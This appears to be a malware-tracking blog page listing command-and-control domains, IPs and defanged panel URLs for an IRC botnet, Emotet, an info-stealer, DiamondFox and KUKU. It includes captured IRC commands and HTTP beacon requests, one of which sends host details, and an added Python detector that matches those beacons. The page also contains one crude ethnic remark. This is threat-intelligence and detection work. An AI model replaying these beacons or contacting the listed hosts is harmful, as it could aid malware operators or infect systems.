gigasbh.org (IRC Botnet Hosted In France Paris 1&1 Internet Ag)

Domains

Domain                    IP
f.eastmoon.pl 148.81.111.101
s.richlab.pl 148.81.111.101
gigasbh.org 82.165.129.253

IRC Traffic

>> NICK {USA-XPx86a}cwecttyo
>> USER cwectty 7949 7840 :cwectty
>> MODE {USA-XPx86a}cwecttyo +iwG
>> JOIN #sp yap
>> PING 422 MOTD
<< 332 {USA-XPx86a}cwecttyo #sp :
<< 333 {USA-XPx86a}cwecttyo #sp x 1436609273
>> PONG 422
>> JOIN #sp yap
>> PING :f4.production.net
>> PONG :f4.production.net
>> JOIN #sp yap

Find the port yourself by sniffing with Wireshark.

Sample here.

Hosting info:
http://whois.domaintools.com/82.165.129.253

197.85.182.110 (Trojan Emotet hosted in South Africa Cape Town Mweb Connect (proprietary) Limited)

Spawned process "cmd.exe" with commandline "/c C:/winclient.au3" (UID: 00009516-00001892)

AutoIt strings inside; maybe this malware is also coded in AutoIt.

Injected into "CCleaner.exe" at 2015-7-2.14:59:47.395 (UID: 00009516-00000996)

Contacts many different hosts:


POSTs files to a webserver

"POST /b215de35/f5665861/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: 200.159.128.132:8080
Content-Length: 203
Connection: Keep-Alive
Cache-Control: no-cache" with no payload

Sample here.

Hosting info:
http://whois.domaintools.com/197.85.182.110

upd.upd4ter.com(malware hosted in Spain Madrid Propelin Consulting S.l.u.)

Contacts domains

upd.upd4ter.com

Contacts server

93.189.33.108:80

In general it steals passwords from browsers and gets all the information from the infected machines.

GET /installer_stats/?action_id=1003&action_description=Virtual&channel_id=&channel_subid=1&channel_param=0&installer_id=101&installer_version=1.1.9.15182&user_registry=0&user_id=&user_hdd=&user_hdd_volume=&user_mac=&user_mb=&user_bios=&user_os=6.1&user_os_arch=&user_cpu=&user_win_identifier=&process_parent=&user_browsers=&user_default_browser=&user_date=&user_vm=&user_antivirus=s)%20Available.&user_dotnet=&channel=&partner=&aff_id= HTTP/1.1
User-Agent: NSIS_ToolkitOffers (Mozilla)
Host: upd.upd4ter.com
Cache-Control: no-cache

Sample here

Hosting info:
http://whois.domaintools.com/93.189.33.108

Gorynych/DiamondFox (hosted in Hungary Budapest Doclerweb Kft)

Thanks to Xylitol for panels and executables.

Panels:

hxxp://computergraphics.in/
hxxp://my-right.fr/
hxxp://bntnl.com/

Files:
PO_37263_pdf.com > bntnl.com/Diamond/Panel/post.php?pl=&slots=1 HTTP/1.1

Xylitol posted a video about the vulnerability of the panel.

Now the ruski behind this shit updated the panel.

Hosting info:
http://whois.domaintools.com/80.77.123.90

KUKU v4.08 beta (Malware hosted in Germany Dortmund 1&1 Internet Ag)

Another version of this malware; some domains changed.

Domain                    IP
makemegood24.com 213.165.83.176
1453eea.makemegood24.com 74.208.153.9
aaakemegood24.com 146.148.34.125
ww11.aaakemegood24.com 166.78.106.200
abakemegood24.com 50.21.181.152
acakemegood24.com 74.208.164.166
adakemegood24.com 74.208.153.9
aeakemegood24.com 87.106.20.192
afakemegood24.com
perfectchoice1.com 193.166.255.171
1459e2b.perfectchoice1.com 193.166.255.171

All hosts


URLs

http://1453eea.makemegood24.com/?1453eea=21315306&id=212331279066

GET /?1453eea=21315306&id=212331279066 HTTP/1.1
User-Agent: KUKU v4.08 beta =212331279066
Host: 1453eea.makemegood24.com
Cache-Control: no-cache

http://perfectchoice1.com/?1459c9a=21339290&id=212331279066

GET /?1459c9a=21339290&id=212331279066 HTTP/1.1
User-Agent: KUKU v4.08 beta =212331279066
Host: perfectchoice1.com
Cache-Control: no-cache

http://aaakemegood24.com/?14540b7=21315767&id=212331279066

GET /?14540b7=21315767&id=212331279066 HTTP/1.1
User-Agent: KUKU v4.08 beta =212331279066
Host: aaakemegood24.com
Cache-Control: no-cache

http://adakemegood24.com/?14547fd=21317629&id=212331279066

GET /?14547fd=21317629&id=212331279066 HTTP/1.1
User-Agent: KUKU v4.08 beta =212331279066
Host: adakemegood24.com
Cache-Control: no-cache

http://acakemegood24.com/?145454a=21316938&id=212331279066

GET /?145454a=21316938&id=212331279066 HTTP/1.1
User-Agent: KUKU v4.08 beta =212331279066
Host: acakemegood24.com
Cache-Control: no-cache

http://ww11.aaakemegood24.com/

GET / HTTP/1.1
User-Agent: KUKU v4.08 beta =212331279066
Connection: Keep-Alive
Cache-Control: no-cache
Host: ww11.aaakemegood24.com

http://abakemegood24.com/?1454374=21316468&id=212331279066

GET /?1454374=21316468&id=212331279066 HTTP/1.1
User-Agent: KUKU v4.08 beta =212331279066
Host: abakemegood24.com
Cache-Control: no-cache
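As an added example (not code from the original post), a small Python detector that parses raw HTTP requests like the ones quoted in these posts and flags the three beacon patterns seen on this page: the KUKU User-Agent, the Emotet-style POST to an /8hex/8hex/ path on port 8080, and the NSIS_ToolkitOffers User-Agent. The sample requests are constructed from the captured traffic above; the benign request and the rule names are assumptions.

```python
import re

# Constructed sample requests, modelled on the traffic quoted in the posts
# (hosts, paths and IDs are the page's own; the last request is a benign
# control that is made up).
REQUESTS = [
    "GET /?1453eea=21315306&id=212331279066 HTTP/1.1\r\n"
    "User-Agent: KUKU v4.08 beta =212331279066\r\n"
    "Host: 1453eea.makemegood24.com\r\n"
    "Cache-Control: no-cache\r\n\r\n",
    "POST /b215de35/f5665861/ HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)\r\n"
    "Host: 200.159.128.132:8080\r\n"
    "Content-Length: 203\r\n\r\n",
    "GET /installer_stats/?action_id=1003&installer_id=101 HTTP/1.1\r\n"
    "User-Agent: NSIS_ToolkitOffers (Mozilla)\r\n"
    "Host: upd.upd4ter.com\r\n\r\n",
    "GET /index.html HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Host: example.com\r\n\r\n",
]

# Detection rules (names are assumed): each is a predicate over a parsed request.
RULES = [
    ("kuku-beacon", lambda r: r["ua"].startswith("KUKU v4.08 beta")),
    ("emotet-post", lambda r: r["method"] == "POST"
        and re.fullmatch(r"/[0-9a-f]{8}/[0-9a-f]{8}/", r["path"]) is not None
        and r["host"].endswith(":8080")),
    ("nsis-toolkitoffers", lambda r: r["ua"].startswith("NSIS_ToolkitOffers")),
]

def parse_request(raw):
    """Split a raw HTTP/1.x request into method, path and the headers we need."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")   # split only on the first colon
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path,
            "host": headers.get("host", ""), "ua": headers.get("user-agent", "")}

def match_rules(raw):
    """Return the names of every rule the request triggers (empty if clean)."""
    req = parse_request(raw)
    return [name for name, pred in RULES if pred(req)]

def scan(requests):
    """Map each flagged request's Host header to the rules it triggered."""
    hits = {}
    for raw in requests:
        names = match_rules(raw)
        if names:
            hits[parse_request(raw)["host"]] = names
    return hits
```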

Sample here.

Hosting info:
http://whois.domaintools.com/213.165.83.176